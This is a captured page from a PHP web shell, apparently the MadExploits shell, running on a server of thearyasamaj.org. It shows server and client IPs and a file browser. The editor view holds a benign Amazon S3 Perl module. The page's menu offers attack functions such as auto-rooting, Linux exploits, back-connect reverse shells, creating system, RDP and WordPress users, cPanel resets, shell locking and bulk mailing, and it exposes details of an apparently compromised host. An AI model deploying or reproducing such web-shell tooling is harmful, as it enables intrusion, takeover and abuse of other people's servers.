Linux server.thearyasamaj.org 4.18.0-553.56.1.el8_10.x86_64 #1 SMP Tue Jun 10 05:00:59 EDT 2025 x86_64
Apache
: 103.90.241.146 | : 216.73.216.28
Cant Read [ /etc/named.conf ]
5.6.40
ftpuser@mantra.thearyasamaj.org
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
libexec /
webmin /
virtual-server /
S3 /
[ HOME SHELL ]
Name
Size
Permission
Action
AWSAuthConnection.pm
10.73
KB
-rw-r--r--
GetResponse.pm
1.39
KB
-rw-r--r--
ListAllMyBucketsResponse.pm
1014
B
-rw-r--r--
ListBucketResponse.pm
1.97
KB
-rw-r--r--
QueryStringAuthGenerator.pm
6.08
KB
-rw-r--r--
Response.pm
1003
B
-rw-r--r--
S3Object.pm
922
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : S3Object.pm
#!/usr/bin/perl # This software code is made available "AS IS" without warranties of any # kind. You may copy, display, modify and redistribute the software # code either by itself or as incorporated into your code; provided that # you do not remove any proprietary notices. Your use of this software # code is at your own risk and you waive any claim against Amazon # Digital Services, Inc. or its affiliates with respect to your use of # this software code. (c) 2006 Amazon Digital Services, Inc. or its # affiliates. package S3::S3Object; use strict; use warnings; sub new { my $proto = shift; my $class = ref($proto) || $proto; my $self = {}; $self->{DATA} = shift; $self->{METADATA} = shift || {}; bless ($self, $class); return $self; } sub data { my ($self) = @_; return $self->{DATA}; } sub metadata { my ($self) = @_; return $self->{METADATA}; } 1;
Close